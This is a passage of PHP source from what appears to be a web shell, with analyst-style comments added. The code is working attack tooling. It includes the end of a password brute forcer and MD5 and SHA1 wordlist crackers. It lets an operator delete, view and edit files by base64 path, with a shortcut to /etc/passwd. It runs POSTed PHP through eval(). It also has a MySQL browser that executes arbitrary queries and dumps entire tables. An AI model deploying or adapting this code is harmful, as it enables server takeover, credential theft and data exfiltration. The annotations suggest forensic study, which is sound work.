
$pw = htmlentities($pw);

die("Password is $pw");

}

}

}

curl_close($curl);

break; // END OF BRUTE FORCER ////////////////////

case "md5crack":

echo('

<h4>MD5 Cracker</h4>

<form method="POST" action="">

Salted: Yes <input type="checkbox" name="yes"> | No <input type="checkbox" name="no"><br>

Hash:               <input type="text" name="hash"><br>

Salt:                 <input type="text" name="salt"><br>

Link2wordlist:  <input type="text" name="wordlist"><br>

<input type="submit" name="submit" value="Cr4ck3rj4ck m3!"><br>

');

$submit = $_POST['submit'];

$hash = $_POST['hash'];

$salt = $_POST['salt'];

$cr4ckm3 = $_POST['wordlist'];

$yes = $_POST['yes'];

$no = $_POST['no'];

if(isset($submit))

{

if(isset($yes))

{

foreach(file($cr4ckm3) as $pass)

{

$pass = trim($pass);

$salted = md5($pass);

$salted = md5($salted.$salt);

if($salted == $hash)

{echo '<script>alert("Success!");</script>';print "Your word is: ".$pass; $bad = "false";}

}

}

if(isset($no)||(!isset($yes)))

{

    foreach(file($cr4ckm3) as $pass)

    {

        $pass = trim($pass);

        $salted = md5($pass);

        if($salted == $hash)

        {

echo '<script>alert("Success!");</script>';print "Your word is: ".$pass; $bad = "false";

        }

    }

}

}

break;

case "sha1crack":

echo('

<h4>Sha1 Cracker</h4>

<form method="POST" action="">

Salted: Yes <input type="checkbox" name="yes"> | No <input type="checkbox" name="no"><br>

Hash:               <input type="text" name="hash"><br>

Salt:                 <input type="text" name="salt"><br>

Link2wordlist:  <input type="text" name="wordlist"><br>

<input type="submit" name="submit" value="Cr4ck3rj4ck m3!"><br>

');

$submit = $_POST['submit'];

$hash = $_POST['hash'];

$salt = $_POST['salt'];

$cr4ckm3 = $_POST['wordlist'];

$yes = $_POST['yes'];

$no = $_POST['no'];

if(isset($submit))

{

if(isset($yes))

{

foreach(file($cr4ckm3) as $pass)

{

$pass = trim($pass);

$salted = sha1($pass);

$salted = sha1($salted.$salt);

if($salted == $hash)

{echo '<script>alert("Success!");</script>';print "Your word is: ".$pass; $bad = "false";}

}

}

if(isset($no)||(!isset($yes)))

{

    foreach(file($cr4ckm3) as $pass)

    {

        $pass = trim($pass);

        $salted = sha1($pass);

        if($salted == $hash)

        {

echo '<script>alert("Success!");</script>';print "Your word is: ".$pass; $bad = "false";

        }

    }

}

}

break;

} // END OF SWITCH

echo "</div>";

// File operations driven by GET parameters — all base64-encoded paths, no checks:
//   delete=<b64 path>  -> unlink()
//   edit=<b64 path>    -> path echoed, then edit_file() at the bottom of this run
//   view=<b64 path>    -> file contents echoed; view=pwd is a shortcut for /etc/passwd
if(!empty($_GET['delete'])){

unlink(base64_decode($_GET['delete']));

}

echo "<hr size=1 color=white>";

echo "<h4><a href='javascript:show(\"files\");'>Show</a>/<a href='javascript:hide(\"files\");'>Hide</a>";

if(!empty($_GET['edit'])){
echo base64_decode($_GET['edit']);
}

if(!empty($_GET['view'])){
echo base64_decode($_GET['view']);
}

echo "</h4>";

echo "<div id='files' style='border:1px solid; height:300px; overflow:auto; background:#161616;'>";

// "Eval PHP" tool: $php_code is assigned from POST evalcode inside the tools switch
// when tool=evalphp, and is eval()'d here verbatim — arbitrary PHP execution in the
// web server's context, independent of the shell-command paths.
if(isset($_POST['eval_code']))
echo(eval(stripslashes($php_code)));

$c = $_GET['view'];

if($_GET['view'] == "pwd")

{

echo "<pre>";

echo(htmlentities(file_get_contents("/etc/passwd")));

echo "</pre>";

}else{

echo "<pre>";

// highlight_string() without its second argument prints the highlighted source
// directly and returns true, so the surrounding htmlentities() only wraps the "1".
// With no view parameter this branch reads base64_decode("") and prints nothing.
if(eregi("php",base64_decode($c)))

echo htmlentities(highlight_string(@file_get_contents(base64_decode($c))));

else{

echo htmlentities(@file_get_contents(base64_decode($c)));

echo "</pre>";

}

}

if(!empty($_GET['edit'])){ $my_file = $_GET['edit']; edit_file($my_file); }

###################################################

####### CONNECT TO MYSQL ##########################

###################################################

// MySQL browser (server=MySQL). Connection parameters come from $_REQUEST and the
// forms below use method="GET", so host, user, password and database all travel in
// the query string — and therefore end up in web-server access logs and Referer
// headers, which is useful for reconstructing what the operator touched.
// htmlentities() is applied to the values before they are used as credentials,
// which mangles any password containing &, <, > or quotes. "Custom Query" runs
// $_POST['query'] unchanged; the column view SELECTs every column of the chosen
// table in full, so database query logs will show complete table dumps.
// Built on the mysql_* extension, which was removed in PHP 7; on modern PHP this
// whole branch fails with an undefined-function error.
if($_GET['server'] == "MySQL"){

$host = htmlentities($_REQUEST['host']); $port = htmlentities($_REQUEST['port']); $user = htmlentities($_REQUEST['user']);
$pass = htmlentities($_REQUEST['pass']); $db = htmlentities($_REQUEST['db']); $table = htmlentities($_REQUEST['table']);
$field = htmlentities($_REQUEST['field']);

$newhost = $host.":".$port;

// On failure the error message echoes the password back into the page, and the
// login form (GET) re-fills it, so the credential is re-sent on every submit.
$connect = mysql_connect($newhost, $user, $pass); if(!$connect){echo "Cannot connect to $user@$host using $pass."; echo '
<form method="GET"> Host: <input type="text" name="host" value="'.$host.'"> <br> Port: <input type="text" name="port" value=
"3306"> <br> User: <input type="text" name="user" value="'.$user.'"> <br> Pass: <input type="text" name="pass" value=
"'.$pass.'"> <br> Database: <input type="text" name="db" value="'.$db.'"> <br> <input type="submit" name="server" value=
"MySQL"> </form> '; }

if(empty($db)){ echo ' <form method="GET"> <select name="db"> ';

$db_list = mysql_list_dbs($connect);

while ($row = mysql_fetch_object($db_list)) { echo "<option value=".$row->Database.">".$row->Database."</option>"; }

echo ' </select>

<input type="hidden" name="host" value="'.$host.'"> <input type="hidden" name="user" value="'.$user.'"> <input type="hidden"
name="port" value="'.$port.'"> <input type="hidden" name="pass" value="'.$pass.'"> <input type="submit" name="server" value=
"MySQL"> </form> ';

}

mysql_select_db($db);

if(!empty($db)){

echo '<h4><a href="'.$_SERVER['REQUEST_URI'].'&do_query=yes">Custom Query</a></h4>';

if($_GET['do_query'] == "yes"){

echo ' <form method="POST"> <textarea name="query" rows="8" cols"25"></textarea> <br> <input type="submit" name="querydb"
value="Query"> </form> ';

// Arbitrary SQL; mysql_query() returns a resource or bool, so echo prints little.
if(isset($_POST['querydb'])){ echo(mysql_query($_POST['query'])); }

}

}

if(!empty($_GET['db']) and empty($table)){

$tables = mysql_list_tables( $db, $connect );

echo "Tables: ";

echo '<table width=100%>';

$x = 0;

while($line = mysql_fetch_row( $tables ) ){

echo '<tr><td>';

echo '<a href="'.$_SERVER['REQUEST_URI'].'&table=';

echo $line[0];

echo '">'.$line[0].'</a>';

echo '</td></tr>';

}

echo '</table>';

} // End of Table list

if(!empty($_GET['table']) and !empty($db) and empty($field)){

$fields = mysql_list_fields($db, $table);

echo "Columns: ";

echo '<div id=single_row><table width=100%>';

$result = mysql_query("SHOW COLUMNS FROM $table"); if (!$result) { echo 'Could not run query: ' . mysql_error(); } if
(mysql_num_rows($result) > 0) { while ($row = mysql_fetch_row($result)) {

echo '<tr><td style="border:1px solid;">';

echo '<a href="'.$_SERVER['REQUEST_URI'].'&field=';

echo $row[0];

echo '">'.$row[0].'</a>';

echo '</td>';

// One SELECT per column, each pulling every row: full-table exfiltration.
$sql = mysql_query("SELECT $row[0] FROM $table"); while($rows = mysql_fetch_array($sql)){ echo '<td style="border:1px solid;">
'; echo $rows[0]; echo '</td>'; }

echo '</tr>';

    } }

echo '</table></div>';

} // End list of fields

############ MYSQL ENDS HERE ##################

} // end of MySQL case

################ END OF FILES CONTENT ##################

echo "</div>";


echo "<df class='footer'>"; echo $footer."</df>";

}

$time_finish = microtime();

$final_time = $time_finish-$time_start;

echo ' <!-- Generation time: '.$final_time.' microseconds. --> ';'));
?>